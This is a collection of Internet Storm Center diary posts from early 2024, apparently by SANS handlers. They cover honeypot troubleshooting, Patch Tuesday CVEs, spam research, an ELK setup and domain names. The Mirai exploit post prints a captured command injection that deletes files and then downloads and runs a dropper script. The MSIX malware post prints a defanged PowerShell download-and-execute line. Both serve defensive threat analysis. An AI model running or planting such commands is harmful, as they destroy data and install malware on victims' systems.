So far, we’ve discovered that we have one very large, corrupted log file. It is too damaged to try to piece back together manually and the structure is too damaged to parse it as JSON. How can we salvage the useful artifacts within?

Let’s forget for a moment that this is meant to be JSON and treat it as any other text. By default, grep will return every line that matches the expression. We can use the -o option to return only the matched part of the data. This is useful because otherwise it would return the entire file on any match.

Return user agents:

Figure 6: Screenshot showing grep output matching the user-agent field in webhoneypot.json

Return hosts:

Figure 7: Screenshot showing grep output matching the IP addresses and ports in webhoneypot.json

There are almost always options and many pathways that lead to success. By reaching for another tool, we can get the information we were looking for.

So what about the Pi?

Let’s quantify my observation that the device was crashing often. Just how often did this happen? I started by copying /var/log/messages from the card over to my local disk. 

How much data are we working with? Let’s get a line count:

wc -l messages

This returned over 450,000 messages. That’s good news, we have some information to inspect. How many of those are startup messages?

grep -i booting messages | wc -l

1,371 matches for boot messages. After checking the start and end date of the log, that’s roughly 200 reboots a day on average. Let’s see if syslog has additional details for us. After searching for messages related to initial startup and grabbing lines that appear before those messages, I was able to spot something. The log contains many mentions of reboot

grep -i /sbin/reboot syslog


Figure 8: Screenshot showing a sample of the grep results for references to /sbin/reboot in syslog


How surprising! The Pi wasn’t crashing, it was being rebooted intentionally by a cron job. I copied the DShield cron located in /etc/cron.d/dshield and took a look at its contents.

grep -i /sbin/reboot dshield


Figure 9: A screenshot showing a number of cron jobs that trigger a reboot

Correction, it’s not a cron job—it’s several. Something has created 216 cron entries to reboot the Pi (this number is familiar, remember our ~200 reboots per day observation from the logs?). What could have made these entries? Let’s search the entire filesystem of the Pi for references to /sbin/reboot

grep -r ?/sbin/reboot? .


Figure 10: A screenshot showing the line in install.sh that appends reboot commands to /etc/cron.d/dshield.

The DShield installer itself creates these entries. I have version 93 which appears to be one version behind the current installer available on GitHub. The installer works by picking random time offsets. Because the firewall log parser uploads the sensor data before rebooting, the intent here is to spread the load so there isn’t a large spike of incoming sensor data at any one time throughout the day. So why would install.sh be running multiple times? You only run it once when you first install the sensor.

The answer is automatic updates. When you initially configure DShield you can enable automatic updates. The update script checks your current version and compares it to the latest version available on GitHub. Remember that my installed version was one behind current.

Figure 11: The updater compares the current DShield version to the latest available. If it sees that we are behind, it checks out the main branch of the repository and performs git pull to download the latest code before running the installer.


Inspecting /srv/log for install logs, it’s clear that the installer is running hundreds of times per day. 


Figure 12: A screenshot showing a directory listing of /srv/log where we see timestamped logs indicating the installer was running many times per day.


So what happened?

Knowing for certain which problem happened first will require further log review, but my current hypothesis is this: At some point, the updater started the installer. The installer created a cron job to kick off a reboot but the random time set for the task happened to be very near the current time. The installer was unable to finish its work before the Pi shut itself down. This is supported by the fact that some of the install logs I reviewed seem to end abruptly before the final messages are printed out.

There are several errors found throughout these logs, including missing certificates, failed package update steps, locked log files, and ‘expected programs not found in PATH’. I believe some combination of these problems caused the installer to fail each time it was ran by the updater, resulting in a loop.


Re-imaging the Pi will be the simplest way to get us out of this situation, but how could the problem be remediated in the long run?

Regardless of the initial cause of this problem, one potential fix for the issue of redundant cron jobs is this:

Before appending the cron job with the reboot and upload tasks, the installer could delete /etc/cron.d/dshield. It appears this file only has three unique entries: 


Figure 13: A screenshot showing the four unique cron jobs used by DShield. We only need these entries, and not the hundreds of redundant lines.


By deleting the file and creating each of these jobs fresh when the installer runs, we can eliminate the risk of creating an 864-line cron configuration file.

It may also be advantageous to move this part of the installer script to the end of the process to eliminate the risk of the reboot firing before the script completes.

Most computer-inclined folks like their processes, their patterns, their Standard Operating Procedures. It’s important that we remain curious and nimble. Sometimes discovering something interesting or useful is the direct result of asking ourselves ‘why’ when something doesn’t seem right. Having the option to throw away a VM or revert it to snapshot is great. Throwing away a docker container that isn’t working the way we expect is convenient. Re-imaging a Pi to get it back to a known-good state helps us jump right back into our work. However, there can be real educational benefit when we slow down and perform troubleshooting on these things we generally view as ephemeral and when we share what we have learned, this can lead to improvements from which we all benefit.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] DShield: https://github.com/DShield-ISC/dshield
[3] Slingshot Linux: https://www.sans.org/tools/slingshot/


Jesse La Grew


Published: 2024-02-13

Microsoft February 2024 Patch Tuesday

This month we got patches for 80 vulnerabilities. Of these, 5 are critical, and 2 are being exploited according to Microsoft.

One of the exploited vulnerabilities is the Internet Shortcut Files Security Feature Bypass Vulnerability (CVE-2024-21412). According to the advisory, an unauthenticated attacker could send the targeted user a specially crafted file that is designed to bypass displayed security checks. However, the attacker would have no way to force a user to view the attacker-controlled content. Instead, the attacker would have to convince them to take action by clicking on the file link. The CVSS for this vulnerability is 8.1.

The second exploited vulnerability is the Windows SmartScreen Security Feature Bypass Vulnerability (CVE-2024-21351). According to the advisory, the vulnerability allows a malicious actor to inject code into SmartScreen and potentially gain code execution, which could potentially lead to some data exposure, lack of system availability, or both.

About the critical vulnerabilities,one of them is the Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2024-21410). According to the advisory, an attacker who successfully exploited this vulnerability could relay a user's leaked Net-NTLMv2 hash against a vulnerable Exchange Server and authenticate as the user. The CVSS for this vulnerability is 9.8 – the highest for this month.

A second critical vulnerability worth mentioning is the Microsoft Outlook Remote Code Execution Vulnerability (CVE-2024-21413). Successful exploitation of this vulnerability would allow an attacker to bypass the Office Protected View and open in editing mode rather than protected mode. An attacker could craft a malicious link that bypasses the Protected View Protocol, which leads to the leaking of local NTLM credential information and remote code execution (RCE). The CVSS for this vulnerability is 9.8 as well.

February 2024 Security Updates

CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG)
-- no title --
%%cve:2024-21626%% No No - - - 8.6 8.6
.NET Denial of Service Vulnerability
%%cve:2024-21386%% No No - - Important 7.5 6.7
%%cve:2024-21404%% No No - - Important 7.5 6.7
Azure Connected Machine Agent Elevation of Privilege Vulnerability
%%cve:2024-21329%% No No - - Important 7.3 6.4
Azure DevOps Server Remote Code Execution Vulnerability
%%cve:2024-20667%% No No - - Important 7.5 6.5
Azure Stack Hub Spoofing Vulnerability
%%cve:2024-20679%% No No - - Important 6.5 5.7
Chromium: CVE-2024-1059 Use after free in WebRTC
%%cve:2024-1059%% No No - - -    
Chromium: CVE-2024-1060 Use after free in Canvas
%%cve:2024-1060%% No No - - -    
Chromium: CVE-2024-1077 Use after free in Network
%%cve:2024-1077%% No No - - -    
Chromium: CVE-2024-1283 Heap buffer overflow in Skia
%%cve:2024-1283%% No No - - -    
Chromium: CVE-2024-1284 Use after free in Mojo
%%cve:2024-1284%% No No - - -    
Dynamics 365 Field Service Spoofing Vulnerability
%%cve:2024-21394%% No No - - Important 7.6 6.6
Dynamics 365 Sales Spoofing Vulnerability
%%cve:2024-21396%% No No - - Important 7.6 6.6
%%cve:2024-21328%% No No - - Important 7.6 6.6
Internet Connection Sharing (ICS) Denial of Service Vulnerability
%%cve:2024-21348%% No No - - Important 7.5 6.5
Internet Shortcut Files Security Feature Bypass Vulnerability
%%cve:2024-21412%% No Yes - - Important 8.1 7.1
MITRE: CVE-2023-50387 DNSSEC verification complexity can be exploited to exhaust CPU resources and stall DNS resolvers
%%cve:2023-50387%% No No - - Important    
Microsoft ActiveX Data Objects Remote Code Execution Vulnerability
%%cve:2024-21349%% No No - - Important 8.8 7.7
Microsoft Azure Active Directory B2C Spoofing Vulnerability
%%cve:2024-21381%% No No - - Important 6.8 6.1
Microsoft Azure File Sync Elevation of Privilege Vulnerability
%%cve:2024-21397%% No No - - Important 5.3 4.8
Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability
%%cve:2024-21403%% No No - - Important 9.0 8.1
Microsoft Azure Kubernetes Service Confidential Container Remote Code Execution Vulnerability
%%cve:2024-21376%% No No - - Important 9.0 8.1
Microsoft Azure Site Recovery Elevation of Privilege Vulnerability
%%cve:2024-21364%% No No - - Moderate 9.3 8.4
Microsoft Defender for Endpoint Protection Elevation of Privilege Vulnerability
%%cve:2024-21315%% No No - - Important 7.8 6.8
Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
%%cve:2024-21389%% No No - - Important 7.6 6.6
%%cve:2024-21393%% No No - - Important 7.6 6.6
%%cve:2024-21395%% No No - - Important 8.2 7.1
Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability
%%cve:2024-21327%% No No - - Important 7.6 6.6
Microsoft Dynamics Business Central/NAV Information Disclosure Vulnerability
%%cve:2024-21380%% No No - - Critical 8.0 7.0
Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability
%%cve:2024-21399%% No No Less Likely Less Likely Moderate 8.3 7.2
Microsoft Entra Jira Single-Sign-On Plugin Elevation of Privilege Vulnerability
%%cve:2024-21401%% No No - - Important 9.8 8.8
Microsoft Exchange Server Elevation of Privilege Vulnerability
%%cve:2024-21410%% No No - - Critical 9.8 9.1
Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability
%%cve:2024-21354%% No No - - Important 7.8 6.8
%%cve:2024-21355%% No No - - Important 7.0 6.1
%%cve:2024-21405%% No No - - Important 7.0 6.1
Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
%%cve:2024-21363%% No No - - Important 7.8 6.8
Microsoft ODBC Driver Remote Code Execution Vulnerability
%%cve:2024-21347%% No No - - Important 7.5 6.5
Microsoft Office OneNote Remote Code Execution Vulnerability
%%cve:2024-21384%% No No - - Important 7.8 6.8
Microsoft Office Remote Code Execution Vulnerability
%%cve:2024-20673%% No No - - Important 7.8 6.8
Microsoft Outlook Elevation of Privilege Vulnerability
%%cve:2024-21402%% No No - - Important 7.1 6.2
Microsoft Outlook Remote Code Execution Vulnerability
%%cve:2024-21413%% No No - - Critical 9.8 8.5
%%cve:2024-21378%% No No - - Important 8.0 7.0
Microsoft Teams for Android Information Disclosure
%%cve:2024-21374%% No No - - Important 5.0 4.4
Microsoft WDAC ODBC Driver Remote Code Execution Vulnerability
%%cve:2024-21353%% No No - - Important 8.8 7.7
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
%%cve:2024-21350%% No No - - Important 8.8 7.7
%%cve:2024-21352%% No No - - Important 8.8 7.7
%%cve:2024-21358%% No No - - Important 8.8 7.7
%%cve:2024-21360%% No No - - Important 8.8 7.7
%%cve:2024-21361%% No No - - Important 8.8 7.7
%%cve:2024-21366%% No No - - Important 8.8 7.7
%%cve:2024-21369%% No No - - Important 8.8 7.7
%%cve:2024-21375%% No No - - Important 8.8 7.7
%%cve:2024-21420%% No No - - Important 8.8 7.7
%%cve:2024-21359%% No No - - Important 8.8 7.7
%%cve:2024-21365%% No No - - Important 8.8 7.7
%%cve:2024-21367%% No No - - Important 8.8 7.7
%%cve:2024-21368%% No No - - Important 8.8 7.7
%%cve:2024-21370%% No No - - Important 8.8 7.7
%%cve:2024-21391%% No No - - Important 8.8 7.7
Microsoft Word Remote Code Execution Vulnerability
%%cve:2024-21379%% No No - - Important 7.8 6.8
Skype for Business Information Disclosure Vulnerability
%%cve:2024-20695%% No No - - Important 5.7 5.0
Trusted Compute Base Elevation of Privilege Vulnerability
%%cve:2024-21304%% No No - - Important 4.1 3.6
Win32k Elevation of Privilege Vulnerability
%%cve:2024-21346%% No No - - Important 7.8 6.8
Windows DNS Client Denial of Service Vulnerability
%%cve:2024-21342%% No No - - Important 7.5 6.5
Windows DNS Information Disclosure Vulnerability
%%cve:2024-21377%% No No - - Important 7.1 6.2
Windows Hyper-V Denial of Service Vulnerability
%%cve:2024-20684%% No No - - Critical 6.5 5.7
Windows Kernel Elevation of Privilege Vulnerability
%%cve:2024-21338%% No No - - Important 7.8 6.8
%%cve:2024-21371%% No No - - Important 7.0 6.1
%%cve:2024-21345%% No No - - Important 8.8 7.7
Windows Kernel Information Disclosure Vulnerability
%%cve:2024-21340%% No No - - Important 4.6 4.0
Windows Kernel Remote Code Execution Vulnerability
%%cve:2024-21341%% No No - - Important 6.8 5.9
Windows Kernel Security Feature Bypass Vulnerability
%%cve:2024-21362%% No No - - Important 5.5 4.8
Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability
%%cve:2024-21356%% No No - - Important 6.5 5.7
Windows Network Address Translation (NAT) Denial of Service Vulnerability
%%cve:2024-21343%% No No - - Important 5.9 5.2
%%cve:2024-21344%% No No - - Important 5.9 5.2
Windows OLE Remote Code Execution Vulnerability
%%cve:2024-21372%% No No - - Important 8.8 7.7
Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
%%cve:2024-21357%% No No - - Critical 7.5 6.5
Windows Printing Service Spoofing Vulnerability
%%cve:2024-21406%% No No - - Important 7.5 6.5
Windows SmartScreen Security Feature Bypass Vulnerability
%%cve:2024-21351%% No Yes - - Moderate 7.6 6.6
Windows USB Generic Parent Driver Remote Code Execution Vulnerability
%%cve:2024-21339%% No No - - Important 6.4 5.6

Renato Marinho
Morphus Labs| LinkedIn|Twitter


Published: 2024-02-12

Exploit against Unnamed "Bytevalue" router vulnerability included in Mirai Bot

Today, I noticed the following URL showing up in our "First Seen" list:


Initially, our sensors detected requests for just "goform/webRead/open". 


screen shot of bytevalue login page
Bytevalue Login page from bytevalue.com

URLs containing "goform" are typically associated with the RealTek SDK. Routers built around the RealTek SoC (System on a Chip) usually use the SDK to implement web-based access tools. The RealTek SDK had numerous vulnerabilities in the past. We currently track over 900 unique URLs in our honeypots using a "/goform/" URL. The most popular URL is usually "goform/set_LimitClient_cfg", associated with CVE-2023-26801 in LB-Link routers. But simple password brute force attacks are also common, taking advantage of default passwords.


So far, I have not been able to identify a specific CVE number for vulnerabilities related to  "goform/webRead/open". However, a Chinese blog post from November [1] suggests that this is related to a vulnerability in routers made by the Chinese company "BYTEVALUE." I could not find a patch for the vulnerability.

The exploit attempt In the URL above follows the standard command injection pattern. URL decode leads to:

rm -rf *; cd /tmp; wget; chmod 777 bruh.sh; ./bruh.sh

With "bruh.sh" being the typical shell script downloading the next stage for various architectures:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lol; chmod +x lol; ./lol 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lmao; chmod +x lmao; ./lmao 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kekw; chmod +x kekw; ./kekw 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O what; chmod +x what; ./what 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kys; chmod +x kys; ./kys 0day_router
[I removed various versions that used offensive filenames]

The binary is simply UPX-packed. The binary contains strings pointing to other router exploits and paths in "/home/landley/", which may indicate the system the binary was compiled on.

Virustotal did not have a sample yet when I uploaded mine [2]. However, the sample is well recognized as a "Mirai" variant that appears correct.

[1] https://blog.csdn.net/zkaqlaoniao/article/details/134328873
[2] https://www.virustotal.com/gui/file/0d0f841ff15c3a01e5376ec7453c2465ec87a9450a21053c3ab4fcb9bbbe1605?nocache=1

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


Published: 2024-02-09

Internet Storm Center Podcast ("Stormcast") 15th Birthday

Happy Birthday to our daily Podcast. 3,685 episodes, about 410 hours or 17 days of content. I hope you are enjoying it. Please do me a favor and participate in our quick two-question survey to help me improve the podcast. It will remain brief and no-frills. But is there any content I should emphasize? Are there any stories I missed or should not have included? Let me know.


The podcast is already available on a wide range of platforms. Use Amazon Alexa to wake you up with the latest news, or "watch" it on YouTube. Of course, most podcast platforms like Apple and Google should carry it. But did I miss one?

And in case you don't know about it yet, here is the latest episode: https://isc.sans.edu/podcastdetail/8846

Looking for a trip back down memory lane? Try Xavier's Stormcast Roulette: https://stormcast.fun/



Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


Published: 2024-02-09

MSIX With Heavily Obfuscated PowerShell Script

A few months ago, we saw waves of MSIX malicious packages[1] dropping malware once installed on victim's computers. I started to hunt for such files and saw a big decrease in interesting hints. Today, my YARA rule triggered a new sample. Called "Rabby-Wallet.msix", the file has a VT score of 8/58[2]

After a quick look, the file appears to implement the same technique to execute a malicious PowerShell payload:

remnux@remnux:/MalwareZoo/20240209$ zipdump.py Rabby-Wallet.msix 
Index Filename                                        Encrypted Timestamp           
    1 Registry.dat                                            0 2024-01-23 11:54:56 
    2 1_Ll57yViA-ZpEVlnH_Hf5ZQ.jpg                            0 1980-00-00 00:00:00 
    3 VC_redist.x86.exe                                       0 2023-10-02 14:34:06 
    4 Refresh2.ps1                                            0 2024-01-16 11:46:44 
    5 StartingScriptWrapper.ps1                               0 2023-12-20 09:54:32 
    6 config.json                                             0 2024-01-23 11:54:56 
    7 PsfRuntime64.dll                                        0 2023-12-20 10:40:08 
    8 PsfRuntime32.dll                                        0 2023-12-20 10:39:36 
    9 PsfRunDll64.exe                                         0 2023-12-20 10:40:12 
   10 PsfRunDll32.exe                                         0 2023-12-20 10:39:40 
   11 Assets/Store50x50Logo.scale-100.jpg                     0 1980-00-00 00:00:00 
   12 Assets/rabby.exeSquare44x44Logo.scale-100.png           0 2023-12-20 09:54:38 
   13 Assets/rabby.exeSquare150x150Logo.scale-100.png         0 2023-12-20 09:54:38 
   14 Assets/Store50x50Logo.scale-150.jpg                     0 1980-00-00 00:00:00 
   15 Assets/Store50x50Logo.scale-125.jpg                     0 1980-00-00 00:00:00 
   16 Assets/Store50x50Logo.scale-200.jpg                     0 1980-00-00 00:00:00 
   17 Assets/Store50x50Logo.scale-400.jpg                     0 1980-00-00 00:00:00 
   18 VFS/AppData/local/gpg.exe                               0 2007-09-17 14:52:14 
   19 VFS/AppData/local/iconv.dll                             0 2004-01-14 00:56:16 
   20 AI_STUBS/AiStubX86.exe                                  0 2024-01-23 11:54:56 
   21 resources.pri                                           0 2024-01-23 11:54:56 
   22 AppxManifest.xml                                        0 2024-01-23 11:54:56 
   23 AppxBlockMap.xml                                        0 2024-01-23 11:54:58 
   24 [Content_Types].xml                                     0 2024-01-23 11:54:56 
   25 AppxMetadata/CodeIntegrity.cat                          0 2024-01-23 11:54:56 
   26 AppxSignature.p7x                                       0 2024-01-23 16:53:16 
remnux@remnux:/MalwareZoo/20240209$ zipdump.py Rabby-Wallet.msix -s 6 -d
    "processes": [
            "executable": ".*",
            "fixups": []
    "applications": [
            "id": "rabby.exe",
            "startScript": {
                "scriptExecutionMode": "-ExecutionPolicy RemoteSigned",
                "scriptPath": "Refresh2.ps1"

Based on the JSON config, you can see that the script called "Refresh2.ps1" will be executed during the MSIX installation. Let's have a look at the content:

For sure, this script will make your eyes cry! When I'm facing such obfuscation, I don't spend my time reversing everything manually. When you need to deobfuscate PowerShell, Microsoft has a wonderful combination of tools for you: logman[3] and AMSI[4].

Let's enable PowerShell tracing:

logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets

Now, let's run the payload and we get this in the output:

You can see that the script will construct an Invoke-Expression call with char()-encoded payload:

IEX (IWR -Uri 'hxxps://ads-analyze[.]top/check1.php' -UseBasicParsing -UserAgent 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.46 OPR/').Content

Unfortunately, the website returns an HTTP 503 error, even with the same User-Agent...

[1] https://isc.sans.edu/diary/Redline+Dropped+Through+MSIX+Package/30404
[2] https://www.virustotal.com/gui/file/b404235ee0e043d7512ab38d88fc3bf2534597e3dff7e6df7ee22fe9cb3c896c/detection
[3] https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/logman
[4] https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant


Published: 2024-02-08

A Python MP3 Player with Builtin Keylogger Capability

I don't know if there is a trend but I recently found some malicious Python scripts (targeting Windows hosts) that include a GUI. They don't try to hide from the victim but, on the opposite, they try to make them confident. One example was the game[1] combined with an infostealer.

Yesterday, I found another one that mimicks an MP3 player:

This is very easy to do in Python, create a TK GUI and use pygame[2] to handle the MP3 files:


This simple MP3 player has a gift for you: It includes a keylogger based on another popular library: pynput[3]. All recorded keystrokes are sent to a simple TCP connection established with the C2. There is no encryption, nothing. Just raw keycodes are sent.

This is a perfect opportunity to show you how powerful keyloggers are. Even, if you use robust passwords, everything is exfiltrated to the attacker's computer. I made a quick video to demonstrate how it works[4]. I just modified the C2 details to match my lab and let's play some music:

The Python script (SHA256:4f6388fa03aaff486886ca09bc1047b109c92451618d90b4aaef2e89ce14a0af) has a very low VT detection score (2/61)[5].

[1] https://isc.sans.edu/diary/Shall+We+Play+a+Game/30510
[2] https://pypi.org/project/pygame/
[3] https://pypi.org/project/pynput/
[4] https://youtu.be/4fViSafrjnY
[5] https://www.virustotal.com/gui/file/4f6388fa03aaff486886ca09bc1047b109c92451618d90b4aaef2e89ce14a0af/details

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant


Published: 2024-02-07

Anybody knows that this URL is about? Maybe Balena API request?

Yesterday, I noticed a new URL in our honeypots: /v5/device/heartbeat. But I have no idea what this URL may be associated with. Based on some googleing, I came across Balena, a platform to manage IoT devices [1]. Does anybody have any experience with this software and know what an attacker would attempt to gain from the URL above? Maybe just fingerprinting devices? I do not see recent vulnerabilities anywhere, but there is a good chance that vulnerable components are being used by the software.

All requests originate from a single IP address, This IP address shows no other activity in our honeypot and appears to be a Canadian consumer IP address. 

Looking back in our data, there are a couple of other URLs that may be related, for example, /v5/search, /v5/.env, and variables of /v5/search/???????/place/[integer number] . 

Balena (or Open Balena) offers an API to manage fleets of IoT devices. A system like this, managing many IoT devices, would certainly be an attractive target. Balena also distributes an "Etcher" tool that is often recommended to create bootable USB sticks from ISO files to install operating systems on devices. But the Etcher tool is a desktop application without network access, and unrelated to the IoT management API.

[1] https://docs.balena.io/reference/api/overview/

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


Published: 2024-02-06

Computer viruses are celebrating their 40th birthday (well, 54th, really)

Although "cyber security" is a relatively new field, it already has quite an interesting history, and it is worthwhile to look back at it from time to time. One historical event, that took place in February of the Orwellian year 1984, and which – therefore – celebrates its 40th anniversary this month, was publishing of Federic Cohen’s paper entitled "Computer viruses: Theory and experiments"[1], which is often cited as the origin of the term "computer virus".

While this is not strictly correct, as probably the first recorded use of the word "virus" to refer to a malicious computer program happened all the way back in 1970, when Gregory Benford’s short story entitled "The Scarred Man" was published in May issue of Venture magazine[2,3], and Cohen himself did some previous work on the subject, it is true that Cohen’s article was almost certainly the first published academic work where the term was at least somewhat formally defined, and where a (pseudo)code of a virus was actually included[4].

Cohen defined "virus" as "a program that can 'infect' other programs by modifying them to include a possibly evolved copy of itself", and demonstrated potential function of such a program with the following pseudocode.

Although the term "computer virus" is still commonly (and quite incorrectly, as we may see from the definition mentioned above) used to refer to any malicious code, real computer viruses are mostly a thing of the past. Probably the last actual virus, which managed to spread in the wild, was KBOT, which was analyzed by Kaspersky in February of 2020[5].

So, it seems, that this month, we may celebrate not just the (somewhat disputable) 40th birthday of computer viruses, but also the 4th anniversary of the last of their kind making any real impact on the world.

[1] https://www.sciencedirect.com/science/article/abs/pii/0167404887901222
[2] https://www.youtube.com/watch?v=GjY1KlmroOU&t=1295s
[3] https://web.archive.org/web/20120116080803/http://www.gregorybenford.com/extra/the-scarred-man-returns/
[4] http://all.net/books/virus/index.html
[5] https://securelist.com/kbot-sometimes-they-come-back/96157/

Jan Kopriva
Nettles Consulting


Published: 2024-02-05

Public Information and Email Spam

Many organizations publicly list contact information to help consumers reach out for help when needed. This may be general contact information or a full public directory of staff. It seems obvious that having any kind of publicly available information will increase the liklihood that these accounts will receive spam or phishing emails. To help understand a bit of this, I set up a brand new domain with a very basic website and collected email using Amazon SES [1] for a couple of weeks. The website contained email addresses in a variety of formats:

  • email@domain
  • email (at) domain
  • email@domain (hidden in HTML comments)
  • web form

The site was made live on 1/21/2024 and within a few hours started receiving scans. 

Email Address /  Source Number of Emails Received Time to Receive 1st Email (Days)
Web Form 4 2
email@domain 7 5
email@domain (HTML Comments) 1 9
email (at) domain 0 N/A

The time to receive an initial email was much longer than I suspected. While scanning of the website happened within the first few hours of the website being publicly available, incoming emails took a couple of days. The web form was also the first method used to submit any content. 

Common themes of the emails received included:

  • Website redesign
  • Android app development
  • Marketing /sales

Email Subjects:

  • FYI- Redesign your website ? 
  • What is the next for <domain>
  • Price List
  • Revealed: Hiring Freelancers Save You Time & Money in 2024
  • Re: Delayed Payment - 2024/1/30 8:00:00
  • Android App Development !! 
  • Re: Call to update your website $
  • your Sales Funnel...? 
  • _Re:_Pay_attention_to_Google=E2=80=99s_guidelines_-_SEO_settings
  • Re: Uncompleted Payment - 2024/1/30 5:25:28

Sending domains:

  • hotmail[.]com
  • nwjgc[.]biz
  • lcs.yqp.mybluehost[.]me
  • ssspay[.]com

At the time of this writing, there were no emails received for an address in this domain that was not listed on the website. There is definitely an impact on spam received when an email address is made publicly available. As more data is collected, more patterns may emerge from source domains and networks. 

Consider limiting data accessible on public resources to help combat spam messaging including contact pages and forums. 

[1] https://aws.amazon.com/ses/

Jesse La Grew


Published: 2024-02-03

DShield Sensor Log Collection with Elasticsearch

This is fork from the original work by Scott Jensen [1][2] originally published here as guest diary part of the SANS.edu BACS program. This update has a number of new features now available in Github [4]. 

The docker compose is custom built to be used with the DShield Honeypot [3][6] to collect, store, parse sensor logs and display the data in a visual and easy way to search and analyze them for research purposes. The assume the DShield sensor is already installed in a Raspberry using PI Raspbian OS or a system running Ubuntu 20.04 LTS either in your network or in the cloud of your choice.

Suggested Setup of ELK Server Based on Ubuntu

  • Ubuntu 20.04 LTS Live Server 64-Bit
  • Minimum 8+ GB RAM
  • If the amount of RAM assigned to each container (see below) is more than 2GB, consider increasing the server RAM capacity.
  • 4-8 Cores
  • Minimum 40 GB partition assigned to /var/lib/docker

Setting Up Docker

The instructions to setup docker and Elasticsearch are listed here.

The docker package comes setup with the fleet-server and the elastic-agent pre-loaded in docker with 350+ integration for collecting and analyzing data which can be used to add threat intel to ELK, collect netflow data with softflowd or any other logs you want to send to ELK. Docker compose is configured with the following components:

  • Kibana
  • Elasticsearch
  • Logstash
  • Elastic-Agent

Example of DShield Dashboard

Dashboard [Logs DShield Sensor] Overview

Traffic & Log Analysis

This section contains direct link to CyberGordon which will query multiple sites for the selected hashes. If the ttylogs DShield sensor logs are collected, they can be moved over to the ELK server for review.

Traffic Analysis, Location and Network Owner

This section contains direct link to CyberGordon, Censys & Shodan.

DShield sensor TTYLog Capture Activity

[1] https://isc.sans.edu/diary/DShield+Sensor+Monitoring+with+a+Docker+ELK+Stack+Guest+Diary/30118
[2] https://github.com/fkadriver/Dshield-ELK
[3] https://isc.sans.edu/tools/honeypot/
[4] https://github.com/bruneaug/DShield-SIEM/tree/main
[5] https://github.com/bruneaug/DShield-SIEM/blob/main/README.md#install-docker
[6] https://github.com/DShield-ISC/dshield
[7] https://www.sans.edu/cyber-security-programs/bachelors-degree/
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


Published: 2024-02-01

What is a "Top Level Domain"?

In yesterday's diary, I discussed a new proposed top-level domain, ".internal". This reminded me to talk a bit about what a top-level domain is all about, and some different ways to look at the definition of a top-level domain.

A quick trip to Google leads to the official definition of "top-level domain" in RFC 1591:

There are a set of what are called "top-level domain names" (TLDs).  These are the generic TLDs (EDU, COM, NET, ORG, GOV, MIL, and INT), and the two letter country codes from ISO-3166.  It is extremely unlikely that any other TLDs will be created.

That last sentence could have aged better. By my count, there are currently 1,452 different top-level domains [2]. But things are even a bit more complex as you start trying to figure out what a "domain" is all about.

There are some "domains" that behave more like top-level domains. For example, "co.uk", is used to assign entities domain names instead of "uk" (there are some legacy .uk domains left). This makes things more complex if you are trying to extract, for example, unique domain names from DNS logs. "co.uk" is likely not what you were looking for. This also affects cookies. Browsers will not allow you to set a cookie for a TLD name. And it would not make much sense to allow cookies for "co.uk", even though that is technically a "domain".

And HTTP cookies offer a path to a solution to the problem. From RFC 6265 [3]:

A "public suffix" is a domain that is controlled by a public registry, such as "com", "co.uk", and "pvt.k12.wy.us". This step is essential for preventing attacker.com from disrupting the integrity of example.com by setting a cookie with a Domain attribute of "com".  Unfortunately, the set of public suffixes (also known as "registry controlled domains") changes over time.  If feasible, user agents SHOULD use an up-to-date public suffix list, such as the one maintained by the Mozilla project at <http://publicsuffix.org/>.

If you are looking for unique domains, you should be looking for <domain>.<publicsuffix>.

For Python developers, there are luckily two different libraries to use the public suffix list from Mozilla: publicsuffix2 [4] and publicsuffixlist [5]. I prefer The second one, but I forgot why (I think it supports IDN better). 

So what are some of these "public suffixes"?

I counted a total of 9,568 different public suffixes. The include expected suffixes like:


But also some suffixes with more than three labels. For example:


Some use a wildcard for the third label:

The idea is that companies who offer subdomains for individual customers, for example, to host blogs or other content, can identify these "subdomains" as controlled by an independent entity. Or, as Mozilla defines it, "mutually untrusting parties."

As stated above, the list is maintained by Mozilla. Domain owners must request the addition of their domain to the list. The list is, of course, ever-changing. There are currently about a hundred outstanding pull requests, and based on the GitHub history, updates are made at least weekly. If you use the list: Make sure you keep it updated.

[1] https://datatracker.ietf.org/doc/html/rfc1591
[2] https://data.iana.org/TLD/tlds-alpha-by-domain.txt
[3] https://datatracker.ietf.org/doc/html/rfc6265#section-5.3
[4] https://pypi.org/project/publicsuffix2/
[5] https://pypi.org/project/publicsuffixlist/

quote from RFC 1591 saying that it is extremely unlikley that new TLDs will be created

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu